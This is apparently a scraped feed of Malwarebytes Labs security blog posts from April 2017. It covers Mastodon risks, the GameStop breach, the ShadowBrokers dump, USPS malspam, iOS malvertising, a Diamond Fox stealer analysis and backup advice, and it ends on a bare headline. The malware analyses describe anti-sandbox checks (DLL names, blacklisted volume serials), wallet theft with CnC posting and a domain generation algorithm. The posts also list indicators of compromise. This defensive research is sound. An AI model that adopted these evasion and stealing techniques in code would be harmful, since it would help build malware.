Additionally, due to the decentralization, there is no concept of “verified accounts” like you would find on centralized social networks — however, some Mastodon users have taken to putting green checkmark emojis in their display names as a joke. This means that you cannot trust any corporate account that is in any “mainstream” Mastodon instance. Mastodon being decentralized would instead allow for corporate entities to set up their own Mastodon instances, so their instance name would prove that they are who they say they are – just like a company’s support email address could be support@example.com email addresses, they could thus have Mastodon accounts of @support@mastodon.example.com or @promotions@mastodon.example.com. Time will tell whether this will actually take place (and this would actually be a good thing as it would allow for companies to own their own social media presence); however, some Mastodon users have suggested that big brands would just do the bare minimum (that is, creating an account on a Mastodon instance that already exists) – this could make their customers more vulnerable to social engineering attempts than they would be otherwise.
I would also like to point out that there have been plans mentioned about allowing a user to set a URL and verifying that they control that site via TXT record; however, it is unknown if this will end up getting implemented.

 

No deleting accounts

Another situation that occurs due to the downside is that you are unable to delete accounts on Mastodon (you can ask your instance administrator to delete your account, but parts of it will remain in other instances). You will also be unable to delete toots that have been federated to other instances. Deleting Mastodon accounts (or federated toots) actually makes no sense due to the decentralization – using the email analogy again, you can change your email address but people you sent emails to will still have messages you previously sent to them. Given that centralized social networks means people seem to have started to forget the rule that “if you post something on the Internet, it stays on the Internet forever” (via people copying to other places), it’s debatable whether this is a good or bad thing. The granular privacy settings on Mastodon means that if you’re worried about this, you can set your toots to never leave the instance you’re on and tell your friends to sign up on the same instance as you.

Conclusion

Mastodon is a style of social network that will be a new idea to many newcomers. It’s still in development, so there’s some missing functionality that can lead to additional risk (and some of that functionality does not make sense to this style of social network, anyway). You will want to be more careful on Mastodon; making a mistake could be more costly there.

The post Mastodon: different social network, additional risks appeared first on Malwarebytes Labs.

Categories: Techie Feeds

GameStop customer data allegedly siphoned in possible breach

Malwarebytes - Mon, 04/10/2017 - 22:05

GameStop, a well-known retailer of video games, electronics, and wireless services, confirmed with KrebsOnSecurity that they are currently investigating reports of hackers breaching their network and siphoning customer information.

After receiving notice from a third party that payment card data has been on sale on a website, a spokesperson from GameStop said, “That day a leading security firm was engaged to investigate these claims. Gamestop has and will continue to work non-stop to address this report and take appropriate measures to eradicate any issue that may be identified.”

KrebsOnSecurity further notes that the stolen data may have included customer card numbers, their expiration dates, names, addresses, and card verification values (CVV2)—the three numbers at the back of the card beside the signature strip that is typically not recorded into systems of online merchants. Stolen CVV2s suggests that malware may have been present on GameStop’s transaction site.

If you, dear Reader, have used your debit or credit card on GameStop’s website between mid-September of 2016 to early February of this year, it’s advisable that you check (or backtrack, too, if you can) your statements for questionable charges against your card. If you see any, give your bank a call and report those said charges.

Lastly, when purchasing online, it is best to use a credit card over a debit card as the former usually has better overall fraud protection than the latter.

The post GameStop customer data allegedly siphoned in possible breach appeared first on Malwarebytes Labs.

Categories: Techie Feeds

ShadowBrokers fails to collect 1M bitcoins – releases stolen information

Malwarebytes - Mon, 04/10/2017 - 17:49

ShadowBrokers finally made good on their promise to release the decryption key to unlock the stolen ‘auction’ file purportedly filled with NSA hacking tools.

Over the weekend, the hacking group ShadowBrokers released the decryption key for the ‘auction’ file that was included in the dump of information from last summer that the group claimed they acquired from Equation Group – reportedly a well-known hacking team responsible for highly sophisticated malware campaigns such as Flame and Stuxnet and possibly associated with certain 3-letter government agencies.

While the group’s get-rich-quick plan to sell the auction file for the astronomical asking price of 1M bitcoins (roughly $1,186,510,000.00 US Dollar as of today) may have ended with spectacular failure, the team has made good on their promise to ultimately release the stolen information should the requested payoff not be received. It’s difficult, if not impossible for us to verify the claims from the hackers or to place attribution to the appropriate group, but there are interesting bits of information contained within the archive and we will document some of the early discoveries here.

The release of the key came in a highly politicized tirade directed to President Donald Trump touching on everything from Obamacare and Goldman Sachs, to Syria, Steven Bannon, and John McCain. The epic rant discusses the Alien and Sedition Act of 1798, Social Collectivism, White Privilege, Russia, and even Magog (I had to look it up too. It seems most applicable to the Islam interpretation of the word. Courtesy of Wikipedia). For the inference of being American citizens and in the eyes of any High School English teacher, it’s a cringe-worthy read filled with grammatical, spelling, and punctuation errors (although, good use of the Oxford comma), and seems to use a variety of written dialects and cultural references throughout. All of which appear to be deliberate false-flags to help conceal the identity of the person/group associated with the original attack.

 

Exploits

There are a number of tools in the dump with notes and code that indicate possible exploits against various software and products. A majority of the files seem to target Linux and Solaris-based servers. Though many of the exploits are dated from many years ago, some as far back as 2003, it’s possible they are still usable on legacy systems. While we can’t confirm the authenticity of the following exploits, we will provide a small snippet from the collection below.

ElatedMonkey is a local privilege escalation exploit against the cPanel Remote Management Web interface current through at least version 24:

 

ElginGamble is a ‘public’ vulnerability affecting Linux 2.6.13 – 2.6.17.4 to create a cron script capable of spawning a root shell:

 

PTrace/ForkPTY is a kernel exploit affecting Linux 2.2 – 2.4:

 

EngageNaughty is an Apache and SSL exploit:

 

EasyStreet appears to be some sort of UDP exploit utilizing sendmail:

 

EBBSHAVE is a vulnerability affecting Solaris RPC services version 2.10:

 

EXCELBERWICK is a remote exploit against xmlrpc.php on Unix based systems:

 

Tools

Aside from the partial selection of exploits posted above, the dump also contains a number of tools, utilities, and scripts to deploy once successful exploitation of the system occurs.

 

Strifeworld is a TCP session recorder that dates from 2001:

 

EndlessDonut helps deploy monitoring agents and to maintain a clean record:

 

Ys.auto is an encompassing script that assists with the deployment of various RATs and system monitors. It’s a curious footnote that the Ford Motor Company IP address appears within a number of files under the ‘example’ section:

 

ELECTRICSLIDE.pl is a PERL script, that as pointed out by x0rz, impersonates a Chinese browser with a fake accept-language:

 

A number of documents reference the deployment of RATs (Remote Access Trojans) to compromised machines. The vast majority of these files appear to target various Solaris, Linux, and FreeBSD clients – just based off their naming conventions. Additional analysis of these files will surely be published in coming days:

 

There also appears to be a number of tools, documents, or scripts that reference cell phone information.

Cdrprint.pl is a script that takes CDR records and makes them pretty. CDR records are data records that are created when call information or other telecommunications transactions (text messages) passes through a processing facility or device. These are accompanied by ‘definition’ files, which to the best of my understanding, helps parse the collected data for specific phones:

 

Within the targets.py file, there are strings and IP addresses relating to the Russian division of Sprint Telecom:

 

The information contained in this dump is extensive and it will take security researchers some time to digest. While many of the exploits appear to be public and quite old, it’s not out of the realm of possibility these vulnerabilities aren’t still useful on legacy systems.

But after spending ample time on a weekend pouring over the data, I fail to find the value in ShadowBrokers initial asking price of 1M bitcoins for an archive filled with publicly known (and probably patched) vulnerabilities dating as far back as 2003. Nothing appears to be more recent than 2013, so the information is likely obsolete and possibly not even used. This appears to be either a massive failure on the part of ShadowBrokers or a giant prank done for the lulz as there is no way they could have possibly thought this sort of information was worth anywhere near what was being asked.  But there is still a lot of information to be analyzed, so time may prove otherwise to this initial assessment.  We will continue to analyze the included information and Windows based files and update this post if new information becomes available.

Regardless, another public disclosure of valuable information reminds us once again the value in OPSEC and secure data retention.

The post ShadowBrokers fails to collect 1M bitcoins – releases stolen information appeared first on Malwarebytes Labs.

Categories: Techie Feeds

USPS-themed malspam now delivering 1-2-3 knock-out

Malwarebytes - Mon, 04/10/2017 - 15:00

We’ve detected an uptick in USPS-themed malspam walloping users with a 1-2-3 knock-out of nasty malware designed to infiltrate your system and steal all your most valuable information. This malware-laced email is actively being distributed with various Subject and Body messages containing references to missing and/or late USPS parcels.

Example of USPS-themed malspam

Should receivers of this mail be convinced of the content and validity of the enclosed message, and thus, be inclined to unpack the included file titled “Delivery-Details.zip” and then proceed against all better known judgement to launch the included JavaScript file titled Delivery-Details.js, they will be subjected to a slew of malware designed to commandeer their PC and steal their most valuable financial information.

Deobfuscated Javascript showing server addresses

 

This particular downloader, known by some as JS/Nemucod or simply JS/Downloader by others, is a well-known JavaScript downloader that is sent out via spam email. Historically this downloader will install 1 or 2 different malware families to infected machines, but the most recent campaign has upped that to 3 different malware families being installed post-detonation.

Shows installed payloads

The 3 malware families are all different in their design but make no mistake about it, all 3 will compromise your security and put your financials at risk.

Trojan.Nymaim is first to come down the line using filename exe1[1].exe. This Trojan provides attackers with remote access to infected machines allowing for everything, from the collection of banking credentials to backdoor functionality allowing attackers full use of the machine.

Trojan.Nymaim at execution

Trojan.Kovter comes down next in the form of exe2[1].exe and using a fancy WinAmp icon and NullSoft description. Trojan.Kovter is known as fileless malware by its ability to execute code directly through the registry. This Trojan also has the ability to steal personal information, download additional malware, or grant attackers full use of the machine. The below image shows how Trojan.Kovter manages it’s ‘fileless’ capabilities with the use of Javascript commands embedded within the Windows registry.

Finally, exe3[1].exe is identified as Trojan.Boaxxe, which as you may guess is also a Trojan with backdoor and stealing capabilities. This Trojan scans the PC for any trace of information deemed valuable by the creators and transmits this information to the attacker’s server for use in further attacks. Information is saved in the form of encrypted registry strings that are continuously updated by the malware.

Information harvesting

 

Taken together, these 3 malware families will take hold of your machine, drain your bank accounts, and leave you high and dry. So just be wary of suspicious looking shipping notices arriving via email and never install files received in email without certainty of their origin.

But should you find yourself curious by the contents of this email message and tempted to install the included Javascript file in the attempts of finding that lost USPS package, then have no worries because you can rest assured that Malwarebytes has your back.

 

IOC’s:

Delivery-Details.js  –  877480DBDE4FCFF9E21E294EF6B64E50

Exe1[1].exe – F22807784588C2117457634494943729

Exe2[1].exe – B10A08A1ACB1B42CA91032EBED613A2A

Exe3[1].exe – 423213BD6A167D4B7DEEC18E7B18E13E

The post USPS-themed malspam now delivering 1-2-3 knock-out appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (Apr 03 – Apr 09)

Malwarebytes - Mon, 04/10/2017 - 14:59

Last week, we gave an overview of what might happen once the bill the US Congress passed in late March takes effect; familiarized readers with the “3-2-1 rule”, which is very helpful in protecting valuable data against ransomware, and pushed out a follow up post on Diamond Fox, a bot used by the Nebula exploit kit. In case you want a refresher of part 1, click here.

Lead analyst Jérôme Segura documented a malvertising campaign affecting users of iOS, a notable deviation of potential targets. Users were enticed to download a ‘free’ VPN app called My Mobile Secure via rogue ads on Torrent sites.

Finally, our experts dished out a list of the five dumbest cyber threats that (unfortunately) work.

Below are notable news stories and security-related happenings:

  • Facebook Turns To Image Recognition to Thwart Revenge Porn. “Revenge porn is the province of the jilted and the jealous, the malicious and the envious. Typically it happens when two people in a relationship share intimate or sexual pictures or videos via text or email; post-break-up, or in the hands of ‘frenemies,’ this content may be posted publicly as payback for heartbreak or other perceived transgressions. It can be enormously damaging for victims, especially younger teen girls.” (Source: InfoSecurity Magazine)
  • IoT Malware Starts Showing Destructive Behavior. “Hackers have started adding data-wiping routines to malware that’s designed to infect internet-of-things and other embedded devices. Two attacks observed recently displayed this behavior but likely for different purposes.” (Source: CSO)
  • New Malware Deliberately Destroys Unsecured IoT Devices. “Cybersecurity experts are warning of a new type of malware strain that uses known default user credentials to attack unsecured Internet of Things (IoT) devices and destroy them, reports Bleeping Computer. Discovered by cybersecurity firm Radware, BrickerBot has two versions – BrickerBot.1 and BrickerBot.2 – and was found to be active since March 20, targeting only Linux BusyBox-based devices with Telnet ports left open.” (Source: Dark Reading)
  • 20,000-bots-strong Sathurbot Botnet Grows By Compromising WordPress Sites. “A 20,000-bots-strong botnet is probing WordPress sites, trying to compromise them and spread a backdoor downloader Trojan called Sathurbot as far and as wide as possible.” (Source: Help Net Security)
  • “iCloud Mail” Phishing Emails Doing Rounds. “The latest email phishing campaign targeting Apple users is aimed at gathering as much information as possible from unfortunate victims. The email, made to look like it comes from Apple, bids targets welcome to iCloud Mail, but warns that the company has been unable to confirm their account information, and that their account has, therefore, been suspended.” (Source: Help Net Security)
  • Matrix Ransomware Spreads To Other PCs Using Malicious Shortcuts. “Brad Duncan, a Threat Intelligence Analyst for Palo Alto Networks Unit 42, has recently started seeing the EITest campaign use the RIG exploit kit to distribute the Matrix ransomware. While Matrix has been out for quite some time, it was never a major player in terms of wide spread distribution.” (Source: Bleeping Computer)
  • Hackers Empty ATMs By Drilling One Small Hole. “Hackers are using a combination of low and high-tech attacks to make ATMs spit out cash, according to Kaspersky researcher Igor Soumenkov, who presented this novel attack at this year’s Security Analyst Summit, taking place in St. Maarten this week.” (Source: Bleeping Computer)
  • Hackers Steal $30M from IRS Via Student Loan Tool. “Hackers managed to breach the IRS’s Data Retrieval Tool, which is used by parents to transfer financial information for their kids using the Free Application for Federal Student Aid. The system has been shut down until the IRS can figure out which of the requests were made by legitimate students, and which were made by criminals.” (Source: Softpedia)
  • Update Your iPhone To Avoid Being Hacked Over Wi-Fi. “It’s only been five days since Apple’s last security update for iOS, when dozens of serious security vulnerabilities were patched. As we mentioned last week, the recent iOS 10.3 and Mac OS 10.12.4 updates included numerous fixes dealing with ‘arbitrary code execution with kernel privileges’.” (Source: Sophos’ Naked Security Blog)
  • Wonga Data Breach Puts Up To 245,000 UK Current And Former Customers At Risk. “If you are one of those affected, my advice is to be very wary of unsolicited phone calls and emails that might be from scammers attempting to exploit the information. You would also be wise to keep a close eye on your finances for any unexpected transactions.” (Source: Graham Cluley’s Blog)

Safe surfing, everyone!

The Malwarebytes Labs Team

The post A week in security (Apr 03 – Apr 09) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

The top 5 dumbest cyber threats that work anyway

Malwarebytes - Sat, 04/08/2017 - 15:00

The common conception of cyber attacks is kind of like bad weather: ranging from irritating to catastrophic, but always unpredictable. Hackers are simply too sophisticated to draw any reliable judgments on and we shouldn’t try. As it turns out, some hackers are fairly predictable in their successful use of really dumb attacks. Here’s a few.

1. The Browser Locker

Browser locker, better known as the fake blue screen of death, spraying gibberish errors at the user and imploring them to call an Indian boiler room to be scammed an average of $500. Some feature tweaks by the major browsers have pushed tech support scammers into more creative iterations, including registry hacks to replace the windows shell itself with a locker. But the browser locker still exists in bulk and still draws victims. Some lockers show some ingenuity, like manipulating the browser’s history function, but most are some variation of:

 

For x in range (a lot) {

Alert(“You have a virus, please call Scam Number”)

}

 

It’s a piece of novice level code that has caused hundreds of millions in losses. Mitigations are wide-ranging, including adblockers (most browser lockers are delivered via malvertising), turning off Javascript in the browser, not downloading software from third-party app stores, and simply force quitting a locked browser.

2. DDOS Extortion

With DDoS bots for sale, sometimes on the clearnet, denial of service itself is not the most sophisticated of attacks. DDoS extortion is one notch lazier; an attacker will simply send an email to a corporate security staff threatening massive attacks if a bitcoin ransom isn’t paid immediately. Given that the ransom in question has tended to be relatively low, companies in industries requiring continuous uptime have sometimes shrugged their shoulders and paid. If this happens to you, talk to your service provider to work out mitigations; don’t talk to the attacker.

3. SQL Injection

SQL Injection takes a modicum of technical skills to pull off, from finding the vulnerable site to executing and safely exfiltrating dumped files or data. So why is this a dumb attack? Because it was first publically discussed in 1998. It was in the OWASP top 10 in 2007 and 2010. It was #1 on the OWASP top 10 in 2013. This is a known, predictable attack with extensive mitigations, so continuing to see it so frequently is profoundly dumb.

4. Business Email Compromise

Sometimes, bosses are jerks. Sometimes when a boss is a jerk, their subordinates are too frightened to question an order from the boss, regardless of how out of character it might be. Attackers have weaponized this cliché of the business world by posing as the aforementioned jerk boss and demanding that large amounts of money be wired to overseas accounts as soon as possible. This scam, which is not much more complicated than shouting “Give me money!” is called Business Email Compromise and has cost US victims $960,708,616 since 2013. There is a reasonably simple mitigation against business email compromise: if you are a boss, don’t be a jerk. Environments, where individual contributors are comfortable asking the boss for clarification if they give an unusual order, stand a much better chance of defending against this attack.

5. Macro Malware

In the old days, MS Office had macros enabled by default. This made for a great malware delivery vector, with malicious attachments that would run all sorts of arbitrary code when opened.  Eventually, Microsoft had enough and switched Office macro support to off by default. Criminals have gotten around this restriction by simply asking the user to enable macros and thereby the malicious code. Here’s the technique cropping up in 2014, and here it is again last month. The defense against macro malware is to not enable macros, no matter how politely an attacker asks. More broadly, a collaborative document editing environment that eliminates the need to pass files around the office can defend against a wide variety of malicious attachments.

In summary, a great many cyber threats are not sophisticated nation-state level, well thought out attacks. The bulk, in fact, tends to be the least effort required for success, which sometimes turns out to be not very much effort at all.

The post The top 5 dumbest cyber threats that work anyway appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Malvertising on iOS pushes eyebrow-raising VPN app

Malwarebytes - Thu, 04/06/2017 - 17:10

There is a preconceived idea that malvertising mostly affects the Windows platform. Certainly, when it comes to malicious adverts, Internet Explorer is a prime target for malware infections. However, malvertising can produce different outcomes adapted to the device the user is running.

Case in point, we discovered this scareware campaign that pushes a ‘free’ VPN app called My Mobile Secure to iOS users via rogue ads on popular Torrent sites. The page plays an ear-piercing beeping sound and claims your device is infected with viruses.

“We have detected that your Mobile Safari is (45.4%) DAMAGED by BROWSER TROJAN VIRUSES picked up while surfing recent corrupted sites.”

Such alerts on mobile devices are not new and sadly common place via many ad networks these days. Usually, aggressive affiliates remunerated per lead will use these kinds of tactics to drive traffic to game apps or even tech support scams.

Thankfully for the latter, Apple has released an update to their mobile operating system (iOS 10.3.1) to avoid so-called “browser lockers” via incessant JavaScript popups that prevented users from closing the offending page. Having said that, social engineering attacks such as the one above are still active and prey on the surprise effect or culpability someone may experience after browsing sites with pirated material.

Network traffic

This malvertising chain starts off with an ad call from Propeller Ads Media, goes through Real Time Bidding (RTB) via AdMetix, is redirected to RevenueHits, and finishes off with scammy advertisers.

‘Free’ VPN app

This fake website advertises the MyMobileSecure VPN to remove “infected applications and files”. Tapping on ‘Remove Virus’ opens up the App Store to download this app.

The MyMobileSecure developer, VoiceFive is a comScore, Inc. company, “a leading global market research company that studies and reports on Internet trends and behavior.” In order to activate the free VPN app, users must join the MobileXpression research community, and this is where things get interesting.

From mymobilescure.com: “The MobileXpression email account is a part of the software download package for iPhones and iPads. The email account is there to provide you with a better way to stay in touch with MobileXpression and also make sure our software works correctly.”

If the product is free, you are the product

According to their website, MobileXpression is a market research panel designed to understand the trends and behaviors of people using the mobile Internet. This seems a bit peculiar when applied to a VPN product, whose goal is to precisely anonymize your online activity by encrypting your data from your ISP, government, bad guys, etc.

As an aside, the topic of VPNs is particularly hot at the moment, on the heels of an upcoming bill (S.J. Res. 34) that would allow Internet Service Providers (ISPs) to sell data about your online habits to advertisers. Many people are rushing into installing the first VPN they can get their hands on, which is a terrible idea considering many companies out there are very shady and far worse than your own ISP.

Free does not mean Open Source or risk-free for that matter. But the fact of the matter is that people tend to gravitate towards free products, especially if those are pushed aggressively via hungry advertisers. For this reason, users should pay even more attention before installing a free app.

If the reason you want to install a VPN is because you are truly worried about your online privacy, then you really ought to read the fine print. This particular VPN app has some concerning statements:

If you shop around for other VPN providers, you will see the exact opposite when it comes to data collection and logging. Here are some examples:

  • [VPN x] never logs where you go on the Internet. If anyone asks, the best we can do is shrug our shoulders.
  • [VPN y] makes it impossible to identify the type of traffic or protocol you are using, even for your ISP.
  • [VPN z] doesn’t store any connection logs whatsoever. In addition, we do not log bandwidth usage, session data or requests to our DNS servers.

Some even provide Bitcoin as a mode of payment to completely anonymize the registration process, via a throwaway email address for example.

VPN providers and trust

Often times, affiliates are not properly policed and we observe scare tactics to force the installation of various pieces of software. It’s important to note that those affiliates are normally distinct from the software vendors themselves, but scammy behaviors end up reflecting poorly on everyone.

In this particular case, one cannot help but feel that this VPN application comes with some serious baggage and unfortunately the average user will not take the time to review the fine details. If the intent is to use a VPN to anonymize your online activities, this does almost the opposite.

One statement from mobileXpression is particularly striking:

We make commercially viable efforts to automatically filter confidential personal information such as UserID, password, credit card numbers, and account numbers. Inadvertently, we may collect personal information about our panelists; and when this happens, we make commercially viable efforts to purge our database of such information.

This summarizes the issue quite clearly: said data should never be collected in the first place because some very unfortunate things can happen once it is logged in a database. Haven’t there been enough data breaches lately to be seriously concerned with what kind of data a company may collect (inadvertently or not)?

Choosing the right VPN application these days has become very challenging due to the renewed interest in online privacy (there are other reasons people buy VPNs as well, such as to bypass geo-restrictions from services like Netflix, the BBC, etc). It’s important to take the time to review the companies behind those products, their policies, and real reviews, not fake or sponsored ones. At the end of the day, you are placing your data and trust in someone else’s hands.

Kudos to CloudFlare for terminating the scareware domain in less than five minutes.

IOCs: onclkds.com xml.admetix.com clk1005.com inclk.com browserloading.com giveawaywins.com securecheckapp.com 206.54.163.50 173.239.53.20 173.192.117.80 108.168.157.87 52.29.11.13 104.31.67.144 104.28.17.3

The post Malvertising on iOS pushes eyebrow-raising VPN app appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Diamond Fox – part 2: let’s dive in the code

Malwarebytes - Thu, 04/06/2017 - 15:00

In a previous post we made an initial analysis of a Diamond Fox bot delivered by the Nebula Exploit Kit (more about the campaign can be found here). We described the way to unpack the protection layer in order to get the core, written in Visual Basic, that can be decompiled. In this second part of the series, we will take a deeper look into the code and analyze the bot’s features and code design.

Analyzed samples

988e9fa903cc2fbb80e7221072fb2221 – Diamond Fox Crystal (final VB payload)

3ef960da3e4bc4bc7c05d02fbf121d4e – old Diamond Fox (final VB payload)

Changelog

In the release that is sold on the black market, the authors included a changelog describing all versions up to the current one (codenamed Crystal). Below, you can see the related fragment:

Crystal Version [+] Loader core recoded [+] Improved Size: 17.5 kb [+] Added unlimited panel list [+] Added domain generation algorithm [+] Added RunOne startup [+] Added Polices startup [+] Added auto-screenshots [+] added Install redirects [+] Added Anti-WinPcap [+] Added Anti-Virustotal VM [+] Added Anti-Emulation [-] Removed Anti-Wine [-] Moved Startup Persistance to Persistance [+] Added Botkiller [+] Added Anti-Avast Sandbox [+] Added PE configuration storage [+] Improved Configuration preview [+] Added optional usb spread on lite bot [+] Added RDP plugin [+] Added VNC Grabber [+] Added remote shell [+] Added Close bot command [+] Added Shutdown PC command [+] Improved web panel installer [+] Added Restart PC command [+] Added more bot selection options on tasks [+] Improved task manager [+] Added search on reports [+] Improved panel settings [+] Added Layer7 DDoS [+] Added reports bars statistics [+] Added New/dead bots per week statistics [+] Updated Geodata [+] Added Bot remover tool [+] Added DGA tool [+] Improved real-time notifications on panel [+] Added Desktop/Laptop Detection [+] Added administrator detection [+] Improved bot full information [+] Added mark as favorite [-] removed %PROGRAMFILES% installation path [+] added %USERPROFILE% installation path [-] removed %WINDIR% installation path [+] added %LOCALAPPDATA% installation path [-] Removed winlogon startup [+] Added schtaks startup [-] Removed Anti-apateDNS [-] Removed Anti-Norman [-] Removed Anti-wiresshark [-] Removed Xor Encryption [+] Added captcha on web panel login [+] Added antibruter forcer on web panel login [+] Added new panel logo [+] Improved Crypto wallet stealer (+24) [+] Improved Homepage changer (added internet explorer) [+] Improved Keylogger(added clipboard detector and window title trigger) [+] Improved bot speed [+] Improved bot compatibility [+] Improved bot stability [-] Removed Services tab on web panel [+] Added protected folder on installation [+] Now the webpanel can be installed on windows without errors Decompiling

As we mentioned in the previous post, Diamond Fox is written in Visual Basic and after unpacking it can be decompiled by VB Decompiler. Unfortunately, the results of the decompilation are not fully accurate and some parts of the code are difficult to analyze. However, we can still figure out the most important actions performed by the malware.

We provided a partially cleaned version of the decompiled code: https://gist.github.com/hasherezade/79de1509c8565ec7496cd554092df6f8#file-module1-vb.

Execution flow

Diamond Fox starts its execution from decrypting and parsing the configuration – in this edition, it is stored in the section “L!NK“. Then, depending on the configuration, some further features are enabled or disabled. For example, it may deploy defensive checks – against sandboxes and Virtual Machines.

The stored parameters are encrypted and they are decrypted at runtime – however, the decryption function is no longer a simple XOR known from the previous versions:

(see a partially cleaned version of this function: https://gist.github.com/hasherezade/79de1509c8565ec7496cd554092df6f8#file-decrypt-vb )

Along with the features that can be enabled or disabled depending on the configuration, Diamond Fox offers features that are controlled from the CnC.

Reading response from the CnC:

Parsing commands and executing appropriate actions (commands are identified by numbers – from 0 to 25):

Features

Let’s have a look inside the code and follow the features mentioned by the authors.

[+] Loader core recoded

The code of the malware has been reorganized and its big portions have been rewritten. It can be noticed at first sight if we decompile the new version and compare it versus the old one. In the current version everything is in one module, while in the previous cases the code was subdivided into various modules.

Old Diamond Fox decompiled (fragment):

We can see the code subdivided on modules with descriptive names, making analysis easier. In the new version, we will not find this familiar layout.

Decompiled code of Diamond Fox Crystal (the new one):

The new version introduced a different way of storing the configuration. Now, the encrypted configuration is in the dedicated section named “L!NK“.

[+] Added domain generation algorithm

In the analyzed sample this feature was not enabled and the CnC address was static. However, looking at the code we can find a domain generation algorithm (DGA) is based on the current date:

(see a partially cleaned version of this function: https://gist.github.com/hasherezade/79de1509c8565ec7496cd554092df6f8#file-domain_generate-vb)

[+] Added Anti-Emulation

Checking if the sample is not running in a VM or sandbox by attempting to load DLLs associated with the virtual environment:

  • vboxmrxnp
  • SbieDll
  • snxhk
  • pthreadVC

It comes also with a set of blacklisted volume serial numbers, identifying popular sandboxes:

  • AC79B241
  • 70144646
  • 6C78A9C3
[+] Added Desktop/Laptop Detection

Checking if it is running on the laptop by testing battery presence:

[+] Added PE configuration storage

The section L!NK is used not only to store initial configuration, but also some fetched data.

The random ID of the bot is generated and stored:

[+] Improved Crypto wallet stealer (+24)

We can find in the code strings used to search several crypto wallets:

MultiBit, Armory, Electrum, digital, -LTC, MultiDoge, BitcoinDark, Unobtanium, Dash, Bit, Lite, Name, PP, Feather, Nova, Prime, Terra, Dev, Anon, Pay, World, Quark, Infinite, Doge, Asic, Lotto, Dark, Mona

Analyzing the code deeper, we find that first the .wallet files are searched:

The found data is grabbed and passed into another function:

That function is responsible for posting the grabbed content to the CnC server:

[+] Added captcha on web panel login

We can observe it if we try to follow the address of the CnC captured during the behavioral analysis. Indeed, near to the credential fields we can see a very simple captcha:

[+] Added new panel logo

The authors of Diamond Fox put a lot of effort to make a graphic design attractive for the user. This time, the panel comes with a set of logos that are randomly changing on page refresh. This feature may seem fancy and redundant in a malware; however, it shows the effort put on the user experience.

[+] Improved Keylogger(added clipboard detector and window title trigger)

As we saw during behavioral analysis, Diamond Fox generates neatly formatted reports about captured users’ activities. They include Clipboard content and the title of the main window, where the particular text was typed:

Conclusion

Diamond Fox Crystal has been solidly refactored in comparison to the older versions. Removing descriptive modules’ names made analysis more difficult. Due to the change in the method of encrypting configuration, now retrieving its content is not as trivial.

Overall, Diamond Fox comes with typical features that we can expect from the stealer. In spite of some improvements, the code quality is still nothing impressive.

Appendix

https://www.cylance.com/a-study-in-bots-diamondfox – about an elder version of Diamond Fox

This was a guest post written by Hasherezade, an independent researcher and programmer with a strong interest in InfoSec. She loves going in details about malware and sharing threat information with the community. Check her out on Twitter @hasherezade and her personal blog: https://hshrzd.wordpress.com.

The post Diamond Fox – part 2: let’s dive in the code appeared first on Malwarebytes Labs.

Categories: Techie Feeds

3, 2, 1, GO! Make backups of your data!

Malwarebytes - Wed, 04/05/2017 - 15:00

With the recent proliferation of ransomware, a type of malware that encrypts your data and holds it hostage until payment is received, what should be done to protect valuable data?

One of the best defences against this threat is having a good backup strategy. This protects your data against all sorts of unpleasant mishaps. How frequently you make them, what you make them to, where they are stored, as well as deploying the automation required to maintain said backup regimen is also crucial. We should all be familiar with making backups, but there is a useful rule of thumb called the “3-2-1 rule”.

A good backup regimen could mean the difference between surviving a catastrophic event such as ransomware or shutting down the business. Let’s use an example file called “Important_stuff.txt” to explain how this all works.

3 Different copies!

For an effective backup plan, you should have at least 3 different copies of this file. A good example would be:

  • One on a workstation, stored locally for editing or on a local server, for ease of access.
  • One stored on a cloud backup solution.
  • One stored on a long-term storage such as a drive array, replicated offsite, or even an old school tape drive.

This diversity of backups is there to ensure your documents are available with added redundancy. If the hard drive on your workstation fails, you have a backup on the server. Server down? The cloud copy is still an option.

If the ransomware did its thing while the server share was mounted to your workstation, it might also be encrypted. Here the cloud copy would save the day.

This is the reason why having 3 different copies is a good idea.

 

2 Different forms of media!

In the example given above, we had 3 copies of our file. The type of media this file is saved to is also important. The hard drive of the workstation and the external share are the fundamentally the same, but the cloud storage is different, as is the tape drive and the disk.

The different media rule most probably harkens back to the days of tape drive backups. If your backup regimen lacked diversity and consisted of only tape drives, it was vulnerable to a failure of the tape drive reader.

This scenario is where the main hard drive fails and the tape drive reader ALSO fails. As tape drives were a long-term storage option, it wouldn’t be uncommon for a new tape drive reader to become hard to source. This means trying to find a new or functioning reader could become difficult making your backups are inaccessible.

The takeaway is that media diversity is equally important. You could store “Important_stuff.txt” on multiple different media, just as long as all your eggs aren’t all in the same technological basket.

Having a diversity of media helps reduce the chances that all possible avenues of recovery will be inaccessible through equipment failure.

1 Copy stored offsite!

One copy of the backup should be stored offsite. If the head office burns down, it won’t matter how many backups you had. In our example, storing “Important_stuff.txt” on a tape drive and having it in a safety deposit box at your bank would negate the “office-burning-down” scenario as well as the perfect storm of ransomware encrypting everything.

Offsite copies will help mitigate a localized event.

 

A word on security.

You should make all best efforts to secure these backups. For an attacker, “Important_stuff.txt” is something that is immediately identified as a high-value item. Remember that if you store your backup in the cloud, the stuarts of this cloud could have access to them. Portable drives are, well… portable, and by this I mean they can be portable in someone else’s pocket!

  • Use strong passwords on that offsite cloud service. Select cloud backup solutions that are zero-knowledge. (The stuarts of the cloud don’t have access to your data in unencrypted form!)
  • Encrypt the data backed up to external solutions.
  • Store these backups in a safe place, preferably under lock and key.

The examples above where encryption is used are how it is beneficial, as opposed to how it is used by ransomware authors.

 

Good automation and discipline!

The single greatest obstacle to a proper 3-2-1 backup regimen is the discipline required to maintain it. A good way to mitigate this is to automate the backup process. The backing up of “Important_stuff.txt” should be transparent to its owner.

Having backups gives you the option to deny ransomware authors by choosing the painful option and restoring from backups…

You could also install our product to mitigate ransomware attacks. (This should not be thought of as a replacement for a good backup strategy!)

 

Payment must be the absolute last resort.

Any option other than paying the cybercriminals for a decryption key is preferable. This is why when we see news reports recommending paying the ransom we collectively shake our heads. Encouraging familiarity with the Bitcoin ecosystem isn’t bad at all. Crypto-currencies are fascinating. Having some stored on hand for a quick payment, however, implies a fundamental failure.

Remember, when you pay the bad guys, you reinforce the viability of these types of attacks. You are teaching them that ransomware works.

 

The post 3, 2, 1, GO! Make backups of your data! appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Your ISP, browsing history, and what to do about it

Malwarebytes - Tue, 04/04/2017 - 17:17

